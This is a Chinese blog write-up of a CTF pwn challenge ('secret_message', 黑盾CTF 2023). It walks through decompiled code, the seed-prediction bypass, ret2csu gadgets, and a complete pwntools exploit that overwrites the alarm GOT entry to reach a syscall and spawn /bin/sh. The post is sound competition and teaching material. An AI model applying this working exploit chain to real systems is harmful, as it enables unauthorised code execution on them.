[黑盾CTF 2023] secret_message 复现

已于 2023-05-25 20:44:39 修改
阅读量1.0k 收藏 2
点赞数
文章标签: CTF
于 2023-05-25 20:41:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/130873740
版权

赛后拿到题目和pwn_ckyan的WP,复现一下,这个题坑还是不小的。120分钟的比赛,只作这一个题还差不多。

先看题。

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF

  init_0();
  if ( check() )
    read(0, buf, 0x100uLL);
  return 0LL;
}

main很直白,先是个init这里有个alarm也算很常见的方法,然后是个检查,检查通过后就是个有溢出的写。

_BOOL8 check()
{
  __int64 s[4]; // [rsp+0h] [rbp-50h] BYREF
  char v2[32]; // [rsp+20h] [rbp-30h] BYREF
  unsigned int seed; // [rsp+40h] [rbp-10h]
  int v4; // [rsp+48h] [rbp-8h]
  int i; // [rsp+4Ch] [rbp-4h]

  seed = time(0LL);
  memset(v2, 0, sizeof(v2));
  memset(s, 0, sizeof(s));
  strcpy((char *)s, "s0d0ao2lnfic9alsl2lmxncbzyqi1j2");
  sub_4008D1(v2, 32);
  srand(seed);
  for ( i = 0; i <= 30; ++i )
  {
    v4 = rand() % 16;
    *((_BYTE *)s + i) ^= v4;
  }
  return strcmp(v2, (const char *)s) == 0;
}

check先取了个时间作为种子,然后把一个密文放到栈上,然后执行sub_4008D1,回来后置种子,再把密文与rand%16异或,然后比较。这里都比较容易,就是srand为什么放到离seed这么远。

char *__fastcall sub_4008D1(char *a1, int a2)
{
  int v2; // edx
  char *result; // rax
  int v5; // [rsp+14h] [rbp-Ch]
  char *buf; // [rsp+18h] [rbp-8h]

  buf = a1;
  while ( a2 )
  {
    v5 = read(0, buf, a2);
    if ( v5 < 0 )
      exit(1);
    a2 -= v5;
    buf += v5;                                  // 指针保持在数据尾部
  }
  v2 = strlen(a1);                              // 读入0x20
  result = buf;
  *(_DWORD *)buf = v2;                          // 用串长度0x1f覆盖seed
  return result;
}

这里边有些小细节,放入数据放到buf,buf是参数引入的,向check的buf写入,读不满不会退出。

这里有个buf+= v5; 每读一次就把指针后移保证下次从尾部接着读,结束读后次串长度存入buf。

  __int64 s[4]; // [rsp+0h] [rbp-50h] BYREF
  char v2[32]; // [rsp+20h] [rbp-30h] BYREF
  unsigned int seed; // [rsp+40h] [rbp-10h]
  int v4; // [rsp+48h] [rbp-8h]
  int i; // [rsp+4Ch] [rbp-4h]

再回来看check的栈,v2存读入的32个字节,后边是seed,从上个函数看,这里被存入的串长度覆盖。因为后边要进行strcmp所以输入应该是31个字符和一个\x00,这里字符串长度应该是31(0x1f),也就是说刚开始放的种time(0)被改为0x1f

对于有足够长溢出的情况下,一般是先puts(got[puts])+main先泄露libc,再system(/bin/sh),但是这个题目似乎一直就没有输入。看下got表

.got.plt:0000000000601018 B0 10 60 00 00 00 00 00       off_601018 dq offset strlen             ; DATA XREF: _strlen↑r
.got.plt:0000000000601020 B8 10 60 00 00 00 00 00       off_601020 dq offset memset             ; DATA XREF: _memset↑r
.got.plt:0000000000601028 C0 10 60 00 00 00 00 00       off_601028 dq offset alarm              ; DATA XREF: _alarm↑r
.got.plt:0000000000601030 C8 10 60 00 00 00 00 00       off_601030 dq offset read               ; DATA XREF: _read↑r
.got.plt:0000000000601038 D0 10 60 00 00 00 00 00       off_601038 dq offset __libc_start_main  ; DATA XREF: ___libc_start_main↑r
.got.plt:0000000000601040 D8 10 60 00 00 00 00 00       off_601040 dq offset srand              ; DATA XREF: _srand↑r
.got.plt:0000000000601048 E0 10 60 00 00 00 00 00       off_601048 dq offset strcmp             ; DATA XREF: _strcmp↑r
.got.plt:0000000000601050 E8 10 60 00 00 00 00 00       off_601050 dq offset time               ; DATA XREF: _time↑r
.got.plt:0000000000601058 F0 10 60 00 00 00 00 00       off_601058 dq offset setvbuf            ; DATA XREF: _setvbuf↑r
.got.plt:0000000000601060 F8 10 60 00 00 00 00 00       off_601060 dq offset exit               ; DATA XREF: _exit↑r
.got.plt:0000000000601068 00 11 60 00 00 00 00 00       off_601068 dq offset rand               ; DATA XREF: _rand↑r

确实没有puts类的输出函数。那么这个问题就来了,怎么弄。

前天写的单次调用写了3个存的模板,对于2.35以后的用一个add 的gadget对got表加偏移改为system。这里是2.27,所以这个方法不适用。这个是传统的ret2csu。

ret2csu使用两个gadget:ppp6和move_call这两个可利用的gadget在程序调入时使用的init函数里

.text:0000000000400A90                               ; void __fastcall init(unsigned int, __int64, __int64)
.text:0000000000400A90                               init proc near                          ; DATA XREF: start+16↑o
.text:0000000000400A90                               ; __unwind {
.text:0000000000400A90 41 57                         push    r15
.text:0000000000400A92 41 56                         push    r14
.text:0000000000400A94 41 89 FF                      mov     r15d, edi
.text:0000000000400A97 41 55                         push    r13
.text:0000000000400A99 41 54                         push    r12
.text:0000000000400A9B 4C 8D 25 6E 03 20 00          lea     r12, off_600E10
.text:0000000000400AA2 55                            push    rbp
.text:0000000000400AA3 48 8D 2D 6E 03 20 00          lea     rbp, off_600E18
.text:0000000000400AAA 53                            push    rbx
.text:0000000000400AAB 49 89 F6                      mov     r14, rsi
.text:0000000000400AAE 49 89 D5                      mov     r13, rdx
.text:0000000000400AB1 4C 29 E5                      sub     rbp, r12
.text:0000000000400AB4 48 83 EC 08                   sub     rsp, 8
.text:0000000000400AB8 48 C1 FD 03                   sar     rbp, 3
.text:0000000000400ABC E8 B7 FB FF FF                call    _init_proc
.text:0000000000400ABC
.text:0000000000400AC1 48 85 ED                      test    rbp, rbp
.text:0000000000400AC4 74 20                         jz      short loc_400AE6
.text:0000000000400AC4
.text:0000000000400AC6 31 DB                         xor     ebx, ebx
.text:0000000000400AC8 0F 1F 84 00 00 00 00 00       nop     dword ptr [rax+rax+00000000h]
.text:0000000000400AC8
.text:0000000000400AD0
.text:0000000000400AD0                               loc_400AD0:                             ; CODE XREF: init+54↓j
.text:0000000000400AD0 4C 89 EA                      mov     rdx, r13
.text:0000000000400AD3 4C 89 F6                      mov     rsi, r14
.text:0000000000400AD6 44 89 FF                      mov     edi, r15d
.text:0000000000400AD9 41 FF 14 DC                   call    qword ptr [r12+rbx*8]
.text:0000000000400AD9
.text:0000000000400ADD 48 83 C3 01                   add     rbx, 1
.text:0000000000400AE1 48 39 EB                      cmp     rbx, rbp
.text:0000000000400AE4 75 EA                         jnz     short loc_400AD0
.text:0000000000400AE4
.text:0000000000400AE6
.text:0000000000400AE6                               loc_400AE6:                             ; CODE XREF: init+34↑j
.text:0000000000400AE6 48 83 C4 08                   add     rsp, 8
.text:0000000000400AEA 5B                            pop     rbx
.text:0000000000400AEB 5D                            pop     rbp
.text:0000000000400AEC 41 5C                         pop     r12
.text:0000000000400AEE 41 5D                         pop     r13
.text:0000000000400AF0 41 5E                         pop     r14
.text:0000000000400AF2 41 5F                         pop     r15
.text:0000000000400AF4 C3                            retn
.text:0000000000400AF4                               ; } // starts at 400A90
.text:0000000000400AF4
.text:0000000000400AF4                               init endp

 ppp6就是从0x400AEA开始的从栈上弹出到6个寄存器。这6个寄存器基本上不怎么用。

mov_call是这段前边0x400AD0开始,将r13,r14,r15d存入rdx,rsi,edi然后调用[r12+rbx*8],这两个配合使用实现填充rsi,rdi并实现call,一般rbx置0,用r12作为调用指针,rdi,rsi为1参2参。

这时候就可以开干了,问题得干起来才能慢慢解决。

第1步要给程序打patch,虽然可以用环境变量调入,但有时候会有些问题,毕竟不可能虚机都跟比赛用的Docker差不多,patchelf还是比较好的办法。

先看下给的libc版本,虽然给的 2.27但2.27也有很多小版本,最好是一样的。

┌──(kali㉿kali)-[~/ctf/0520]
└─$ strings libc-2.27.so|grep ubuntu
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.6) stable release version 2.27.
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.

然后打上patch

patchelf --add-needed ~/glibc/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so pwn
patchelf --set-interpreter ~/glibc/libs/2.27-3ubuntu1.6_amd64/ld-2.27.so pwn

这时候这个环境跟Docker就比较像了,但还是有差别,不过不影响运行

思路:

  1. 通过check,ctypes调用srand,rand得到预测的值生成密文
  2. 调用read修改alarm的got表,alarm向后偏移,去掉无用部分得到一个syscall
  3. 再次调用read向bss的可写区写/bin/sh 并利用返回值(长度)存入rax,给rax填入59(execv的中断调用号)
  4. 用gadget调用alarm(已改为syscall)获得shell

第1块是要过这个check(名字是后来在ida里为方便看自己改的,这也算是个习惯吧。虽然浪费点时间但是以后看起来方便)

置种和取rand这块前边写过用ctypes调用libc,由于不同版本的libc里 rand函数基本不变,所以并不一定要用完全相同的版本。

from pwn import *
from ctypes import *

binary = './pwn'

p = process(binary)
context(arch='amd64', log_level='debug')

elf = ELF(binary)
libc = ELF('./libc-2.27.so')
clibc = cdll.LoadLibrary("/home/kali/glibc/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")

#clibc.srand(clibc.time(0))
# *(_DWORD *)buf = v2;      // 用串长度0x1f覆盖seed
clibc.srand(0x1f)  

sec = b"s0d0ao2lnfic9alsl2lmxncbzyqi1j2"
s = bytes([v^(clibc.rand()%16) for v in sec]) + b'\x00'
p.send(s)
print('send:',s)

这块过了以后,后边跟return时的现场有关,比如当时的寄存器和查看写入的payload,所以这里在return前下断点,观察。

 这里rdi=0这里已经有rdi,只需要pop rsi即可,如果rdi没有就弹一次rdi,在pop r15;ret,一般大多情况下pop rdi;pop rsi都是有的,可以用ROPgadget在程序里找。pop rdi就在ppp6的尾部pop r15; ret的错位。pop rsi;pop r15;ret是ppp6尾部pop r14;pop r15;ret的错位。经常是rdx比较难弄,不过read函数只要不是太小就能用。这里是0x100足够了。

┌──(kali㉿kali)-[~/ctf/0520/secret_message]
└─$ ROPgadget --binary pwn --only 'pop|ret'             
Gadgets information
============================================================
0x0000000000400aec : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400aee : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400af0 : pop r14 ; pop r15 ; ret
0x0000000000400af2 : pop r15 ; ret
0x0000000000400aeb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400aef : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004007d0 : pop rbp ; ret
0x0000000000400af3 : pop rdi ; ret
0x0000000000400af1 : pop rsi ; pop r15 ; ret
0x0000000000400aed : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400691 : ret
0x00000000003fc0f9 : ret 0x3f

现在看alarm的情况

gef➤  x/5i &alarm
   0x7ffff78e44f0 <alarm>:      mov    eax,0x25
   0x7ffff78e44f5 <alarm+5>:    syscall

可以看到alarm的代码给eax填充后就直接调用syscall,由于程序加载里尾12位(1个半字节)不发生变化,所以只需要把got表里的尾字节f0改成f5就直接得到syscall

第2次read需要将rsi改为随便一个可写地址,一般在bss的后部。bss一般程序只用了前边一点儿,而一个段至少0x1000字节,所以后边写是比较安全的。rax里存read的反回值这里执行完read后,如果read的长度是59正好是exec的syscall调用号。

后一半代码

#gdb.attach(p, "b*0x400a8d\nc")

pop_rdi = 0x0000000000400af3 # pop rdi ; ret
pop_rsi_r15 = 0x0000000000400af1 # pop rsi ; pop r15 ; ret
ppp6 = 0x400AEA
mov_call = 0x400AD0
got_alarm = 0x601028
buf = 0x601800

pay = b'A'*0x38 + flat([
    pop_rsi_r15, elf.got['alarm'], 0, elf.sym['read'],  #sym['alarm']+5 = syscall 
    pop_rsi_r15, buf, 0, elf.sym['read'],   #read /bin/sh  len(payload)=0x3b rax=0x3b
    ppp6, 0,0, elf.got['alarm'], 0,0, buf,  # r12=got.alarm r15=buf
    mov_call                                #
 ])
p.send(pay.ljust(0x100, b'\x00'))

p.send(b'\xf5')   #0x7ffff78e44f0 <alarm>: 0xb8 0x25 0x0 0x0 0x0 0xf 0x5 0x48    +5=0f05 syscall 输入尾号f5修改alarm为syscall
p.send(b'/bin/sh'.ljust(0x3b, b'\x00'))

p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
攻防世界 Misc高手进阶区 5分题 Avatar
闵行小鱼塘
12-21 636
继续ctf的旅程,攻防世界Misc高手进阶区的5分题,本篇是Avatar的writeup
ctf实验室2020-11-24misc练习
没用的阿吉
11-26 170
ctf实验室2020-11-24 misc练习 (1)下载后打开看到两个文件txt文件,其中一个全为16进制数将其复制后粘贴到winhex中,粘贴后更改后缀 得到1.zip 尝试打开发现需要密码,尝试爆破出现警告信息 说明文件还不对,放入010中查看发现,结尾并不为504B而是FFD9说明可能有张图片,先使用foremost分离得到图片 将图片手动从初始压缩包中进行分离,得到正常压缩包。 将分离出的图片压缩后得到的压缩包,对crc值对比,发现crc相同,使用明文爆破压缩文件尝试 成功后打开压缩包得到fla
ctf赛题secret.php,CTF赛题全解之CTF成长之路(三)
weixin_39594312的博客
03-12 750
1.题目名称:BuyFlag打开页面发现有个payflag的页面点进去查看源代码发现注释中有代码判断password参数是否是404,这里利用了is_numeric函数来进行判断所以提交404%20即可绕过is_numeric的判断。又要求必须是学生才行,这里看到cookie的user字段。这里我们改为1再进行提交。通过判断一开始在源代码中的代码,我们添加money参数,将参数设置为flag的价格...
CTF-隐写术(八)
→_→
09-21 2554
声明:以下CTF题均来自网上收集,在这里主要是给新手们涨涨见识,仅供参考而已。需要题目数据包的请私信或在下方留言。 15.复杂的QR_code(来源:实验吧) 1.关卡描述 2.解题步骤 分析: 1.下载图片,发现是一个二维码,尝试扫描,看到“secret is here” 2.既然是一个隐写的题,选择binwalk 处理一下这个图片 发现里面是一个zip文件 或者用winhex打开: ...
CTF相关之代码py报错 from secret import FLAG ImportError: cannot import name ‘FLAG‘ from ‘secret‘
m0_68714668的博客
05-25 5006
运行python代码时报错: from secret import FLAG ImportError: cannot import name 'FLAG' from 'secret' (D:\python.10\lib\site-packages\secret\__init__.py)
PolarD&N_PWN_Choice
Kuluha的博客
10-14 191
当v4等于1时,选择Data1,当v4等于2时,选择Data2,如果v4不等用于1或2,则执行Data3.那么我们只要通过向scanf发送不等于1或2的数,就可以执行Data3。PS:怎么选择Data3呢,感觉在好多人眼里这是一个再简单不过的问题,但是在以前这个问题难倒了我好一阵,所以,我选择在这里开一个小讲堂帮助一下那些跟我一样不知道也不敢问的家人们,大家可以各取所需。在主函数中我们发现三个选项,分别为Data1/2/3,我们分别点开函数发现,三者中唯有Data3存在足够的溢出可以使我们进一步操作。
[XXX]不知道是啥比赛,放在群里的附件
weixin_52640415的博客
07-10 408
这题是脑筋急转弯,给了10次猜,虽然有随机数,但你可以猜同一个,错了还会保存数。两次rsa,可以根据leak1=(p2+q2)>>400求出得到p2,q2,然后求出leak2,再根据leak2求p1。主程序部分作了SMC,需要把这一段函数异或0xc3解密,IDA才能看。加密部分,是tea加密,还是见得少,见多了一眼就能看出来。虽然都不复杂,可这两个模板不是大众型的,有必要存好。三部分,主体有密钥,然后 init和异或加密,RC4。这个居然没作出来,问了群友,原来把题目的+=看成=了。
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF.rar_ctf_seed7rj
09-21
【标题】"CTF.rar_ctf_seed7rj" 暗示了这是一个与网络安全相关的挑战,CTF(Capture The Flag)是网络安全领域常见的比赛形式,通常涉及逆向工程、密码学、网络攻防等技能。"seed7rj"可能是这次挑战的一个特定标识...
hac.zip_CTF信息隐写_ctf
09-23
【标题】"hac.zip_CTF信息隐写_ctf"是一个关于CTF(Capture The Flag)比赛中的信息隐写技术的入门教程。CTF是一种网络安全竞赛,参赛者通过解决各种安全问题来获取“旗标”或关键信息,以此赢得比赛。而信息隐写则...
ctf_all_in_one.pdf
08-19
ctf_all_in_one这个一个能够为想去做网路攻防的人做的技术贴,书中包含了ctf需要的技能列表
ctf.rar_ctf
09-21
this is script from my ctf
[BMZCTF-pwn] 24-pwn2
weixin_52640415的博客
02-16 170
第二题是个栈溢出的题,也属于白送的那种,程序直接调用check在check里向48字节的空间写入0x400,导致栈溢出。而且没有canary没开pie这样就能直接通过溢出 int check() { char buf[48]; // [rsp+0h] [rbp-30h] BYREF read(0, buf, 0x400uLL); return strcmp(buf, "21232F297A57A5A743894A0E4A801FC3"); } 思路就是先通过溢出调用puts(got[pu
【web | CTF】极客大挑战 2019 Secret File
weixin_46301214的博客
05-27 1166
解题要点 【解题思路】 目录扫描+检查源码 ->发现了一个隐藏目录 根据文字提示,觉察到有隐藏暗跳 找到暗链后访问就能看到解题源码 直接利用文件访问漏洞读取php文件源码即可 【难点】 通过题目语言暗示觉察出暗中跳转 【漏洞点】 源码泄露 文件包含漏洞 步骤一:发现隐藏目录 查看源码发现了隐藏的目录文件 ctrl+点击,跳转速达 步骤二:发现隐藏文件跳转网址 SECRET可以点击,那我们就点一下看看吧...
pwn-随机计算题类型
IT_huanhuan的博客
05-25 1109
沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,**只能采取open/read/write的组合方式来读取flag。
CTF中的PWN——srand()/rand()漏洞(栈溢出)
壊壊的诱惑你的博客
11-16 4531
摘要: 本以为自己栈溢出学的不错了,挑战了一下攻防世界的PWN高手进阶,发现栈溢出还是有很多相关的漏洞,今天总结一下srand()函数的漏洞。 srand()/rand(): 简单介绍一下这两个函数: rand()函数是使用线性同余法做的,它并不是真的随机数,因为其周期特别长,所以在一定范围内可以看成随机的。 srand()为初始化随机数发生器,用于设置rand...
ctf_awd_platform
最新发布
10-23
CTF(Capture The Flag)即夺旗赛,是一种网络安全竞赛形式。AWD(Attack-Defense)平台是一种特殊的CTF比赛平台,主要专注于攻击和防御的技能训练与比拼。 ctf_awd_platform是指一种特定的AWD平台,其目的是为了提供一个安全的环境,让参赛选手能够在其中进行攻击和防御的实战训练。 在ctf_awd_platform中,参赛选手将分为多个小队,每个小队都需要同时进行攻击和防御。比赛的过程中,参赛选手需要使用各种技术和工具,对其他小队的系统进行攻击,尝试获取对方的旗帜。同时,参赛选手也需要保护自己的系统,防止其他小队进行攻击并窃取自己的旗帜。 ctf_awd_platform提供了一个仿真的网络环境,模拟了现实世界中的网络系统。参赛选手可以在这个环境中进行攻防实战,通过解决各种网络安全问题来提升自己的技能。 ctf_awd_platform不仅能够帮助参赛选手提升网络攻防技术,还能够提高其团队合作能力和解决问题的能力。在比赛中,参赛选手需要与队友紧密配合,共同制定攻击和防御策略,以获取最佳的比赛成绩。 总体而言,ctf_awd_platform是一个能够帮助参赛选手提升网络安全技术和团队合作能力的AWD平台,通过实战演练来提高参赛选手的技能水平,并为他们在网络安全领域的职业发展打下坚实的基础。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值